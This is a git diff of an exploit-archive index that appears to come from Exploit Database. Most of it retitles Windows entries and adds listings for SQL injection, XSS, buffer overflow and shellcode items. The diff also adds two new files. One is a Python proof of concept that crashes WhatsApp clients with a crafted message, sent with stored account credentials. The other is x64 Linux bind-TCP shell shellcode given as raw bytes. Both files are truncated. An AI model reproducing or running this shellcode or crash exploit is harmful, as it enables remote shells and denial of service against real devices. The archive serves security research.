Vulnerability",2011-02-14,eXa.DisC,php,webapps,0 16168,platforms/php/webapps/16168.txt,"runcms 2.2.2 - Multiple Vulnerabilities",2011-02-14,"High-Tech Bridge SA",php,webapps,0 16169,platforms/windows/local/16169.py,"Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit",2011-02-15,mr_me,windows,local,0 @@ -14032,7 +14032,7 @@ id,file,description,date,author,platform,type,port 16259,platforms/windows/remote/16259.txt,"home ftp server 1.12 - Directory Traversal",2011-02-28,clshack,windows,remote,0 16260,platforms/windows/dos/16260.py,"Quick 'n Easy FTP Server 3.2 - Denial of Service",2011-02-28,clshack,windows,dos,0 16261,platforms/multiple/dos/16261.txt,"PHP Exif Extension 'exif_read_data()' Function Remote DoS",2011-02-28,"_ikki and paradoxengine",multiple,dos,0 -16262,platforms/windows/dos/16262.c,"MS Windows XP - WmiTraceMessageVa Integer Truncation Vulnerability PoC (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0 +16262,platforms/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation Vulnerability PoC (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0 16263,platforms/linux/dos/16263.c,"Linux Kernel <= 2.6.37 - Local Kernel Denial of Service",2011-03-02,prdelka,linux,dos,0 16264,platforms/windows/local/16264.pl,"Magic Music Editor - Buffer Overflow Exploit",2011-03-02,"C4SS!0 G0M3S",windows,local,0 16265,platforms/php/webapps/16265.txt,"Readmore Systems Script SQL Injection Vulnerability",2011-03-02,"vBzone and Zooka and El3arby",php,webapps,0 @@ -14872,7 +14872,7 @@ id,file,description,date,author,platform,type,port 17128,platforms/php/webapps/17128.txt,"greenpants 0.1.7 - Multiple Vulnerabilities",2011-04-06,"Ptrace Security",php,webapps,0 17129,platforms/php/webapps/17129.txt,"S40 CMS 0.4.2b LFI Vulnerability",2011-04-07,Osirys,php,webapps,0 17132,platforms/php/webapps/17132.py,"Joomla! com_virtuemart <= 1.1.7 - Blind SQL Injection Exploit",2011-04-08,"TecR0c and mr_me",php,webapps,0 -17133,platforms/windows/dos/17133.c,"Microsoft Windows xp AFD.sys Local Kernel DoS Exploit",2011-04-08,"Lufeng Li",windows,dos,0 +17133,platforms/windows/dos/17133.c,"Microsoft Windows XP - AFD.sys Local Kernel DoS Exploit",2011-04-08,"Lufeng Li",windows,dos,0 17134,platforms/php/webapps/17134.txt,"phpcollab 2.5 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0 17135,platforms/php/webapps/17135.txt,"viscacha 0.8.1 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0 17136,platforms/php/webapps/17136.txt,"Joomla JCE Component (com_jce) Blind SQL Injection Vulnerability",2011-04-09,eidelweiss,php,webapps,0 @@ -16240,7 +16240,7 @@ id,file,description,date,author,platform,type,port 18816,platforms/windows/dos/18816.py,"LAN Messenger <= 1.2.28 - Denial of Service Vulnerability",2012-05-01,"Julien Ahrens",windows,dos,0 18817,platforms/hardware/dos/18817.py,"Mikrotik Router Denial of Service",2012-05-01,PoURaN,hardware,dos,0 18818,platforms/windows/remote/18818.py,"Solarwinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection Exploit",2012-05-01,muts,windows,remote,0 -18819,platforms/windows/dos/18819.cpp,"Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability",2012-05-02,"Lufeng Li",windows,dos,0 +18819,platforms/windows/dos/18819.cpp,"Microsoft Windows XP - Win32k.sys Local Kernel DoS Vulnerability",2012-05-02,"Lufeng Li",windows,dos,0 18820,platforms/php/webapps/18820.php,"OpenConf <= 4.11 (author/edit.php) Remote Blind SQL Injection Exploit",2012-05-02,EgiX,php,webapps,0 18822,platforms/php/webapps/18822.txt,"php-decoda - Cross-Site Scripting In Video Tag",2012-05-02,"RedTeam Pentesting",php,webapps,0 18823,platforms/windows/local/18823.txt,"Symantec pcAnywhere Insecure File Permissions Local Privilege Escalation",2012-05-02,"Edward Torkington",windows,local,0 @@ -16505,7 +16505,7 @@ id,file,description,date,author,platform,type,port 19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 Memory Corruption Exploit",2012-06-14,"Felipe Andres Manzano",multiple,local,0 19141,platforms/windows/remote/19141.rb,"Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)",2012-06-14,metasploit,windows,remote,0 19142,platforms/linux/local/19142.sh,"Oracle 8 File Access Vulnerabilities",1999-05-06,"Kevin Wenchel",linux,local,0 -19143,platforms/windows/local/19143.c,"Microsoft Windows ""April Fools 2001"" Vulnerability",1999-01-07,"Richard M. Smith",windows,local,0 +19143,platforms/windows/local/19143.c,"Microsoft Windows - ""April Fools 2001"" Vulnerability",1999-01-07,"Richard M. Smith",windows,local,0 19144,platforms/windows/local/19144,"Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 Backdoor Vulnerability",1999-01-07,"Satu Laksela",windows,local,0 19145,platforms/windows/local/19145.c,"NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4 Server Operator to Administrator Privilege Escalation: System Key Vulnerability",1999-01-11,Mnemonix,windows,local,0 19146,platforms/linux/local/19146.sh,"DataLynx suGuard 1.0 Vulnerability",1999-01-03,"Dr. Mudge",linux,local,0 @@ -16923,7 +16923,7 @@ id,file,description,date,author,platform,type,port 19591,platforms/windows/remote/19591.txt,"MS IE 4.0/5.0,Outlook 98 0 window.open Redirect Vulnerability",1999-11-04,"Georgi Guninski",windows,remote,0 19592,platforms/windows/remote/19592.asm,"Real Networks GameHouse dldisplay ActiveX control 0 Port Buffer Overflow (1)",1999-11-04,"dark spyrit",windows,remote,0 19593,platforms/windows/remote/19593.c,"Real Networks GameHouse dldisplay ActiveX control 0 Port Buffer Overflow (2)",1999-11-04,"dark spyrit",windows,remote,0 -19594,platforms/windows/local/19594.txt,"MS Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Spoolss.exe DLL Insertion Vulnerability",1999-11-04,"Marc of eEye",windows,local,0 +19594,platforms/windows/local/19594.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Spoolss.exe DLL Insertion Vulnerability",1999-11-04,"Marc of eEye",windows,local,0 19595,platforms/windows/remote/19595.c,"Computer Software Manufaktur Alibaba 2.0 - Multiple CGI Vulnerabilties",1999-11-03,Kerb,windows,remote,0 19596,platforms/windows/remote/19596.txt,"Byte Fusion BFTelnet 1.1 Long Username DoS Vulnerability",1999-11-03,"Ussr Labs",windows,remote,0 19597,platforms/php/webapps/19597.txt,"GuestBook Scripts PHP 1.5 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 @@ -17530,7 +17530,7 @@ id,file,description,date,author,platform,type,port 20229,platforms/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin DoS Vulnerability",2000-09-15,"Rude Yak",multiple,dos,0 20230,platforms/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 Local Root Compromise",2000-06-24,"Stephen J. Friedl",sco,local,0 20231,platforms/hardware/remote/20231.txt,"Cisco PIX Firewall 4.x/5.x SMTP Content Filtering Evasion Vulnerability",2000-09-19,"Lincoln Yeoh",hardware,remote,0 -20232,platforms/windows/local/20232.cpp,"MS Windows 2000/NT 4 DLL Search Path Weakness",2000-09-18,"Georgi Guninski",windows,local,0 +20232,platforms/windows/local/20232.cpp,"Microsoft Windows 2000/NT 4 - DLL Search Path Weakness",2000-09-18,"Georgi Guninski",windows,local,0 20233,platforms/windows/dos/20233.txt,"NetcPlus BrowseGate 2.80 DoS Vulnerability",2000-09-21,"Delphis Consulting",windows,dos,0 20234,platforms/multiple/remote/20234.txt,"extent technologies rbs isp 2.5 - Directory Traversal vulnerability",2000-09-21,anon,multiple,remote,8002 20235,platforms/windows/remote/20235.pl,"Cisco Secure ACS for Windows NT 2.42 Buffer Overflow Vulnerability",2000-09-21,blackangels,windows,remote,0 @@ -18148,7 +18148,7 @@ id,file,description,date,author,platform,type,port 20877,platforms/hardware/webapps/20877.txt,"Conceptronic Grab’n’Go and Sitecom Storage Center Password Disclosure",2012-08-28,"Mattijs van Ommeren",hardware,webapps,0 20878,platforms/cgi/remote/20878.txt,"mimanet source viewer 2.0 - Directory Traversal vulnerability",2001-05-23,joetesta,cgi,remote,0 20879,platforms/unix/remote/20879.txt,"OpenServer 5.0.5/5.0.6,HP-UX 10/11,Solaris 2.6/7.0/8 rpc.yppasswdd Buffer Overrun",2001-05-10,metaray,unix,remote,0 -20880,platforms/windows/local/20880.c,"MS Windows 2000 Debug Registers Vulnerability",2001-05-24,"Georgi Guninski",windows,local,0 +20880,platforms/windows/local/20880.c,"Microsoft Windows 2000 - Debug Registers Vulnerability",2001-05-24,"Georgi Guninski",windows,local,0 20881,platforms/multiple/remote/20881.txt,"Beck IPC GmbH IPC@CHIP TelnetD Login Account Brute Force Vulnerability",2001-05-24,"Courtesy Sentry Research Labs",multiple,remote,0 20882,platforms/multiple/remote/20882.txt,"faust informatics freestyle chat 4.1 sr2 - Directory Traversal vulnerability",2001-05-25,nemesystm,multiple,remote,0 20883,platforms/windows/dos/20883.txt,"Faust Informatics Freestyle Chat 4.1 SR2 MS-DOS Device Name DoS",2001-05-25,nemesystm,windows,dos,0 @@ -18924,14 +18924,14 @@ id,file,description,date,author,platform,type,port 21681,platforms/windows/remote/21681.html,"Opera 6.0.x FTP View Cross-Site Scripting Vulnerability",2002-08-06,"Eiji James Yoshida",windows,remote,0 21682,platforms/unix/remote/21682.txt,"Mozilla 1.0/1.1 FTP View Cross-Site Scripting Vulnerability",2002-08-06,"Eiji James Yoshida",unix,remote,0 21683,platforms/linux/local/21683.c,"qmailadmin 1.0.x Local Buffer Overflow Vulnerability",2002-08-06,"Thomas Cannon",linux,local,0 -21684,platforms/windows/local/21684.c,"MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (1)",2002-08-06,sectroyer,windows,local,0 -21685,platforms/windows/local/21685.c,"MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (2)",2002-08-06,"Oliver Lavery",windows,local,0 -21686,platforms/windows/local/21686.c,"MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (3)",2002-08-06,"Brett Moore",windows,local,0 -21687,platforms/windows/local/21687.c,"MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (4)",2002-08-06,"Brett Moore",windows,local,0 -21688,platforms/windows/local/21688.c,"MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (5)",2002-08-06,"Oliver Lavery",windows,local,0 -21689,platforms/windows/local/21689.c,"MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (6)",2002-08-06,"Brett Moore",windows,local,0 -21690,platforms/windows/local/21690.txt,"MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (7)",2002-08-06,"Ovidio Mallo",windows,local,0 -21691,platforms/windows/local/21691.txt,"MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (8)",2002-08-06,anonymous,windows,local,0 +21684,platforms/windows/local/21684.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (1)",2002-08-06,sectroyer,windows,local,0 +21685,platforms/windows/local/21685.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (2)",2002-08-06,"Oliver Lavery",windows,local,0 +21686,platforms/windows/local/21686.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (3)",2002-08-06,"Brett Moore",windows,local,0 +21687,platforms/windows/local/21687.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (4)",2002-08-06,"Brett Moore",windows,local,0 +21688,platforms/windows/local/21688.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (5)",2002-08-06,"Oliver Lavery",windows,local,0 +21689,platforms/windows/local/21689.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (6)",2002-08-06,"Brett Moore",windows,local,0 +21690,platforms/windows/local/21690.txt,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (7)",2002-08-06,"Ovidio Mallo",windows,local,0 +21691,platforms/windows/local/21691.txt,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (8)",2002-08-06,anonymous,windows,local,0 21692,platforms/windows/remote/21692.txt,"MS IE 5/6,Konqueror 2.2.2/3.0,Weblogic Server 5/6/7 Invalid X.509 Certificate Chain",2002-08-06,"Mike Benham",windows,remote,0 21693,platforms/windows/remote/21693.nasl,"Microsoft SQL Server 2000 User Authentication Remote Buffer Overflow Vulnerability",2002-08-06,"Dave Aitel",windows,remote,0 21694,platforms/windows/remote/21694.pl,"602Pro LAN SUITE 2002 Telnet Proxy Localhost Denial of Service Vulnerability",2002-08-03,"Stan Bubrouski",windows,remote,0 @@ -18984,8 +18984,8 @@ id,file,description,date,author,platform,type,port 21743,platforms/php/webapps/21743.txt,"phpmybittorrent 2.04 - Multiple Vulnerabilities",2012-10-04,waraxe,php,webapps,0 21744,platforms/windows/webapps/21744.txt,"Novell Sentinel Log Manager <= 1.2.0.2 - Retention Policy Vulnerability",2012-10-04,"Piotr Chmylkowski",windows,webapps,0 21745,platforms/php/webapps/21745.txt,"Achievo 0.7/0.8/0.9 - Remote File Include Command Execution Vulnerability",2002-08-22,"Jeroen Latour",php,webapps,0 -21746,platforms/windows/dos/21746.c,"MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0 -21747,platforms/windows/dos/21747.txt,"MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0 +21746,platforms/windows/dos/21746.c,"Microsoft Windows 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0 +21747,platforms/windows/dos/21747.txt,"Microsoft Windows 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0 21748,platforms/windows/remote/21748.txt,"MS IE 5/6 Legacy Text Formatting ActiveX Component Buffer Overflow",2002-08-22,"Mark Litchfield",windows,remote,0 21749,platforms/windows/remote/21749.txt,"Microsoft Internet Explorer 5/6 XML Redirect File Disclosure Vulnerability",2002-08-23,"GreyMagic Software",windows,remote,0 21750,platforms/windows/remote/21750.txt,"Microsoft Internet Explorer 5 Dialog Same Origin Policy Bypass Variant Vulnerability",2002-04-16,"GreyMagic Software",windows,remote,0 @@ -19137,7 +19137,7 @@ id,file,description,date,author,platform,type,port 21899,platforms/php/webapps/21899.txt,"PHPWebSite 0.8.3 Article.PHP Cross-Site Scripting Vulnerability",2002-10-02,Sp.IC,php,webapps,0 21900,platforms/php/webapps/21900.txt,"MySimpleNews 1.0 PHP Injection Vulnerability",2002-10-02,frog,php,webapps,0 21901,platforms/php/webapps/21901.txt,"MySimpleNews 1.0 - Remotely Readable Administrator Password Vulnerability",2002-10-02,frog,php,webapps,0 -21902,platforms/windows/remote/21902.c,"MS Windows XP/2000/NT 4 Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0 +21902,platforms/windows/remote/21902.c,"Microsoft Windows 2000/XP/NT 4 - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0 21903,platforms/php/webapps/21903.txt,"Michael Schatz Books 0.54/0.6 PostNuke Module Cross Site Scripting Vulnerability",2002-10-03,Pistone,php,webapps,0 21904,platforms/aix/local/21904.pl,"IBM AIX 4.3.x/5.1 ERRPT Local Buffer Overflow Vulnerability",2003-04-16,watercloud,aix,local,0 21905,platforms/php/webapps/21905.txt,"phpMyNewsLetter 0.6.10 Remote File Include Vulnerability",2002-10-03,frog,php,webapps,0 @@ -19155,8 +19155,8 @@ id,file,description,date,author,platform,type,port 21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 Trojan Horse Vulnerability",2002-10-08,netmask,unix,remote,0 21920,platforms/asp/webapps/21920.txt,"Microsoft Content Management Server 2001 Cross-Site Scripting Vulnerability",2002-10-09,overclocking_a_la_abuela,asp,webapps,0 21921,platforms/php/webapps/21921.txt,"VBZoom 1.0 - Arbitrary File Upload Vulnerability",2002-10-09,hish,php,webapps,0 -21922,platforms/windows/local/21922.c,"MS Windows XP/2000/NT 4 NetDDE Privilege Escalation Vulnerability (1)",2002-10-09,Serus,windows,local,0 -21923,platforms/windows/local/21923.c,"MS Windows XP/2000/NT 4 NetDDE Privilege Escalation Vulnerability (2)",2002-10-09,Serus,windows,local,0 +21922,platforms/windows/local/21922.c,"Microsoft Windows 2000/XP/NT 4 - NetDDE Privilege Escalation Vulnerability (1)",2002-10-09,Serus,windows,local,0 +21923,platforms/windows/local/21923.c,"Microsoft Windows 2000/XP/NT 4 - NetDDE Privilege Escalation Vulnerability (2)",2002-10-09,Serus,windows,local,0 21924,platforms/asp/webapps/21924.txt,"SurfControl SuperScout Email Filter 3.5 MsgError.ASP Cross-Site Scripting Vulnerability",2002-10-08,ken@FTU,asp,webapps,0 21925,platforms/asp/webapps/21925.txt,"SurfControl SuperScout Email Filter 3.5 User Credential Disclosure Vulnerability",2002-10-08,ken@FTU,asp,webapps,0 21926,platforms/cgi/webapps/21926.txt,"Authoria HR Suite AthCGI.EXE Cross-Site Scripting Vulnerability",2002-10-09,Max,cgi,webapps,0 @@ -26572,7 +26572,7 @@ id,file,description,date,author,platform,type,port 29627,platforms/php/webapps/29627.php,"Magic News Plus 1.0.2 preview.php php_script_path Parameter Remote File Inclusion",2007-02-21,"HACKERS PAL",php,webapps,0 29628,platforms/php/webapps/29628.txt,"Magic News Plus 1.0.2 news.php link_parameters Parameter XSS",2007-02-21,"HACKERS PAL",php,webapps,0 29629,platforms/php/webapps/29629.txt,"Magic News Plus 1.0.2 n_layouts.php link_parameters Parameter XSS",2007-02-21,"HACKERS PAL",php,webapps,0 -29630,platforms/windows/local/29630.c,"Microsoft Windows 2003/XP ReadDirectoryChangesW Information Disclosure Vulnerability",2007-02-22,3APA3A,windows,local,0 +29630,platforms/windows/local/29630.c,"Microsoft Windows 2003/XP - ReadDirectoryChangesW Information Disclosure Vulnerability",2007-02-22,3APA3A,windows,local,0 29631,platforms/php/webapps/29631.txt,"Pyrophobia 2.1.3.1 modules/out.php id Parameter XSS",2007-02-22,"laurent gaffie",php,webapps,0 29632,platforms/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 admin/index.php Multiple Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29633,platforms/ios/webapps/29633.txt,"Google Gmail IOS Mobile Application - Persistent / Stored XSS",2013-11-16,"Ali Raza",ios,webapps,0 @@ -31818,7 +31818,7 @@ id,file,description,date,author,platform,type,port 35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0 35324,platforms/php/webapps/35324.txt,"Wordpress CM Download Manager Plugin 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps,0 35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0 -35326,platforms/windows/dos/35326.cpp,"Microsoft Windows Win32k.sys - Denial of Service",2014-11-22,Kedamsky,windows,dos,0 +35326,platforms/windows/dos/35326.cpp,"Microsoft Windows - Win32k.sys Denial of Service",2014-11-22,Kedamsky,windows,dos,0 35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0 35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 'nav.html' Cross Site Scripting Vulnerability",2011-02-09,MustLive,php,webapps,0 @@ -31974,6 +31974,7 @@ id,file,description,date,author,platform,type,port 35489,platforms/multiple/dos/35489.pl,"Perl 5.x 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service Vulnerability",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0 35490,platforms/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,php,webapps,0 35491,platforms/php/webapps/35491.txt,"PBBoard CMS - Stored XSS Vulnerability",2014-12-08,"Manish Tanwar",php,webapps,0 +35492,platforms/php/webapps/35492.txt,"Free Article Submissions 1.0 - SQL Injection Vulnerability",2014-12-08,BarrabravaZ,php,webapps,0 35493,platforms/php/webapps/35493.txt,"Wordpress Ajax Store Locator 1.2 - Arbitrary File Download",2014-12-08,"Claudio Viviani",php,webapps,0 35495,platforms/multiple/remote/35495.txt,"Advantech/BroadWin SCADA WebAccess 7.0 - Multiple Remote Security Vulnerabilities",2011-03-23,"Ruben Santamarta ",multiple,remote,0 35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0 @@ -32051,6 +32052,8 @@ id,file,description,date,author,platform,type,port 35582,platforms/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35583,platforms/php/webapps/35583.txt,"Piwigo 2.7.2 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 +35586,platforms/lin_x86-64/shellcode/35586.c,"x64 Linux bind TCP port shellcode (81 bytes, 96 with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 +35587,platforms/lin_x86-64/shellcode/35587.c,"x64 Linux reverse TCP connect shellcode (77 to 85 bytes, 90 to 98 with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) LFI to RCE",2014-12-22,"Patrick Webster",php,remote,9000 35589,platforms/windows/dos/35589.py,"NotePad++ 6.6.9 - Buffer Overflow",2014-12-22,TaurusOmar,windows,dos,0 35590,platforms/windows/local/35590.txt,"BitRaider Streaming Client 1.3.3.4098 Local Privilege Escalation Vulnerability",2014-12-23,LiquidWorm,windows,local,0 @@ -32096,3 +32099,10 @@ id,file,description,date,author,platform,type,port 35634,platforms/php/webapps/35634.txt,"WordPress WP-StarsRateBox Plugin 1.1 'j' Parameter SQL Injection Vulnerability",2011-04-19,"High-Tech Bridge SA",php,webapps,0 35635,platforms/php/webapps/35635.txt,"Dalbum 1.43 'editini.php' Cross Site Scripting Vulnerability",2011-04-19,"High-Tech Bridge SA",php,webapps,0 35636,platforms/php/webapps/35636.txt,"ChatLakTurk php Botlu Video 'ara.php' Cross Site Scripting Vulnerability",2011-04-19,"kurdish hackers team",php,webapps,0 +35637,platforms/android/remote/35637.py,"WhatsApp <= 2.11.476 - Remote Reboot/Crash App Android",2014-12-28,"Daniel Godoy",android,remote,0 +35638,platforms/multiple/remote/35638.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/E1Menu.maf jdeowpBackButtonProtect Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35639,platforms/multiple/remote/35639.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/E1Menu_Menu.mafService e1.namespace Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35640,platforms/multiple/remote/35640.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/E1Menu_OCL.mafService e1.namespace Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35641,platforms/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/MafletClose.mafService RENDER_MAFLET Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35642,platforms/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35643,platforms/php/webapps/35643.txt,"webSPELL 4.2.2a Multiple Cross-Site Scripting Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0 diff --git a/platforms/android/remote/35637.py b/platforms/android/remote/35637.py new file mode 100755 index 000000000..c29493c6e --- /dev/null +++ b/platforms/android/remote/35637.py @@ -0,0 +1,104 @@ +#!/usr/bin/python +#-*- coding: utf-8 -* + +# Title: WhatsApp Remote Reboot/Crash App Android +# Product: WhatsApp +# Vendor Homepage: http://www.whatsapp.com +# Vulnerable Version(s): 2.11.476 +# Tested on: WhatsApp v2.11.476 on MotoG 2014 -Android 4.4.4 +# Date: 26/12/2014 +# #RemoteExecution - www.remoteexecution.net +# +# Author Exploit: +# Daniel Godoy @0xhielasangre +# Credits: +# Gonza Cabrera +# +# Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html +# +# Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android. +# It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even +# engaging in an interactive conversation over WhatsApp protocol +# + +import argparse, sys, os, csv +from Yowsup.Common.utilities import Utilities +from Yowsup.Common.debugger import Debugger +from Yowsup.Common.constants import Constants +from Examples.CmdClient import WhatsappCmdClient +from Examples.EchoClient import WhatsappEchoClient +from Examples.ListenerClient import WhatsappListenerClient +from Yowsup.Registration.v1.coderequest import WACodeRequest +from Yowsup.Registration.v1.regrequest import WARegRequest +from Yowsup.Registration.v1.existsrequest import WAExistsRequest +from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2 +from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2 +from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2 +from Yowsup.Contacts.contacts import WAContactsSyncRequest + +import threading,time, base64 + +DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth" +COUNTRIES_CSV = "countries.csv" + +DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth" + + +######## Yowsup Configuration file ##################### +# Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n +# phone: Your full phone number including country code, without '+' or '00' +# id: This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup +# on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions +# of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on +# a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials +# or want to register, you can leave this field blank or set it to some random text. +# password: Password to use for login. You obtain this password when you register using Yowsup. +###################################################### +MINE_CONFIG ="config" + +def getCredentials(config = DEFAULT_CONFIG): + if os.path.isfile(config): + f = open(config) + + phone = "" + idx = "" + pw = "" + cc = "" + + try: + for l in f: + line = l.strip() + if len(line) and line[0] not in ('#',';'): + + prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1) + + varname = prep[0].strip() + val = prep[1].strip() + + if varname == "phone": + phone = val + elif varname == "id": + idx = val + elif varname =="password": + pw =val + elif varname == "cc": + cc = val + + return (cc, phone, idx, pw); + except: + pass + + return 0 + +def main(phone): + credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG ) + + if credentials: + + countryCode, login, identity, password = credentials + identity = Utilities.processIdentity(identity) + + password = base64.b64decode(password) + + # Custom message that will crash WhatsApp + message = message = "#RemoteExecution? \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/35586.c b/platforms/lin_x86-64/shellcode/35586.c new file mode 100755 index 000000000..c26c51c00 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/35586.c @@ -0,0 +1,248 @@ +/* +* Author: Sean Dillon +* Copyright: (c) 2014 CAaNES, LLC. (http://caanes.com) +* Release Date: December 19, 2014 +* +* Description: x64 Linux null-free TCP bind port shellcode, optional 4 byte password +* Assembled Size: 81 bytes, 96 with password +* Tested On: Kali 1.0.9a GNU/Linux 3.14.5-kali1-amd64 x86_64 +* License: http://opensource.org/license/MIT +* +* Build/Run: gcc -m64 -z execstack -fno-stack-protector bindshell.c -o bindshell.out +* ./bindshell.out & +* nc localhost 4444 +*/ + +/* +* NOTE: This C code binds on port 4444 and does not have the password option enabled. +* The end of this file contains the .nasm source code and instructions for building from that. +*/ + +#include +#include + +unsigned char shellcode[] = + "\x31\xf6" /* xor %esi,%esi */ + "\xf7\xe6" /* mul %esi */ + "\xff\xc6" /* inc %esi */ + "\x6a\x02" /* pushq $0x2 */ + "\x5f" /* pop %rdi */ + "\x04\x29" /* add $0x29,%al */ + "\x0f\x05" /* syscall */ + "\x50" /* push %rax */ + "\x5f" /* pop %rdi */ + "\x52" /* push %rdx */ + "\x52" /* push %rdx */ + "\xc6\x04\x24\x02" /* movb $0x2,(%rsp) */ + "\x66\xc7\x44\x24\x02\x11\x5c" /* movw $0x5c11,0x2(%rsp) */ + "\x54" /* push %rsp */ + "\x5e" /* pop %rsi */ + "\x52" /* push %rdx */ + "\x6a\x10" /* pushq $0x10 */ + "\x5a" /* pop %rdx */ + "\x6a\x31" /* pushq $0x31 */ + "\x58" /* pop %rax */ + "\x0f\x05" /* syscall */ + "\x5e" /* pop %rsi */ + "\xb0\x32" /* mov $0x32,%al */ + 